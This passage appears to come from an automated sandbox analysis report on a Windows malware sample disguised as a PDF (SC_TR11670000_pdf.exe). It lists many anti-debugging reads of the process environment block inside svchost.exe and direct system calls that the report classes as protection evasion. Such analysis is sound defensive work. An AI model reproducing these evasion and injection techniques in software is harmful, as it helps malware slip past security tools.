                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]1_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]1_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h]1_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D678E mov eax, dword ptr fs:[00000030h]1_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h]1_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h]1_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h]1_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h]1_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h]1_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov eax, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664588 mov eax, dword ptr fs:[00000030h]1_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h]1_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h]1_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E443 mov eax, dword ptr fs:[00000030h]1_2_0366E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA456 mov eax, dword ptr fs:[00000030h]1_2_036EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362645D mov eax, dword ptr fs:[00000030h]1_2_0362645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365245A mov eax, dword ptr fs:[00000030h]1_2_0365245A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0362E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0362C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03628B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03704B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0365EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B0A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exe | Code function: 0_2_00B0A364 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
